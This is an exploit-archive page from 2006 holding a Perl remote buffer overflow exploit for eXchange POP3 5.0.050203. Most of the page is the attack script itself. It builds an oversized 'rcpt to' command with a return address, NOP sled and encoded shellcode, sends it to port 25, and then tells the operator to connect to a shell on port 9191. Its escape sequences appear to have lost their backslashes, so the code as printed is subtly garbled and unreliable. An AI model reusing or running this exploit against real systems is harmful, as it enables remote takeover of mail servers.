eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit
# Published : 2006-02-03
# Author : securma massine
# Previous Title : Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (2)
# Next Title : Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (meta)

#!/usr/bin/perl -w        
# for educational purposes only .   
  use IO::Socket;
                      if ($#ARGV<0) 
                    { 
                         print "n write the target IP!! nn"; 
                       exit; 
                     } 
                $buffer2 = "x90"x1999999;
                $mailf= "mail";
                $rcptt ="rcpt to:<";
                $buffer = "x41"x4100;
                $ret   = "x80x1dxdcx02";
                $shellcode = "xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33".
                      "xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C".
                      "x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE".
                      "x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB".
                      "xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77".
                      "xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77".
                      "xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77".
                      "xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77".
                      "xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77".
                      "xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77".
                      "xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77".
                      "xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77".
                      "xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77".
                      "xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB".
                      "x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C".
                      "xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0".
                      "x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77".
                      "xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0".
                      "xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB".
                      "x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5".
                      "x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98".
                      "xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE".
                      "x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77".
                      "xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8".
                      "x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF".
                      "x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90".
                      "x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74".
                      "xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4".
                      "xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94".
                      "x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5".
                      "xD3x4Ax8Cx88";

                $enter  = "x0dx0a";
                $connect = IO::Socket::INET ->new (Proto=>"tcp",
                PeerAddr=> "$ARGV[0]",
                PeerPort=>"25"); unless ($connect) { die "cant connect" }  
                print "nExchangepop3 v5.0  remote exploit by securma massinen";
                print "n+++++++++++www.morx.org++++++++++++++++n";              
                $connect->recv($text,128); 
                print "$textn";
                $connect->send($mailf . $enter); 
                $connect->recv($text,128); 
                print "$textn";
                $connect->send($rcptt . $buffer . $ret . $buffer2 .  $shellcode . $enter); 
                print "nsending exploit......nn";
                 print "ntelnet to  server port 9191 .........nn";

# www.Syue.com [2006-02-03]